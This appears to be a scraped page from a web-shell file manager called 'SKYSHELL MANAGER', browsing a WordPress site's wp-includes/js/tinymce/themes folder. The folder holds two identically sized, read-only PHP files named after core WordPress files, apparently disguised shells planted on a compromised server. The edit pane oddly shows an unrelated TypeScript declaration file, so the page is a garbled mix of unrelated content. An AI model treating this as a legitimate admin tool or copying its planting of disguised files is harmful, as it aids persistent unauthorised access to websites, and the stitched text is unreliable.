📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: properties.d.ts
import type { CodeKeywordDefinition, ErrorObject, KeywordErrorDefinition, SchemaObject } from "../../types"; import type { KeywordCxt } from "../../compile/validate"; import { _JTDTypeError } from "./error"; declare enum PropError { Additional = "additional", Missing = "missing" } declare type PropKeyword = "properties" | "optionalProperties"; declare type PropSchema = { [P in string]?: SchemaObject; }; export declare type JTDPropertiesError = _JTDTypeError<PropKeyword, "object", PropSchema> | ErrorObject<PropKeyword, { error: PropError.Additional; additionalProperty: string; }, PropSchema> | ErrorObject<PropKeyword, { error: PropError.Missing; missingProperty: string; }, PropSchema>; export declare const error: KeywordErrorDefinition; declare const def: CodeKeywordDefinition; export declare function validateProperties(cxt: KeywordCxt): void; export default def;
Save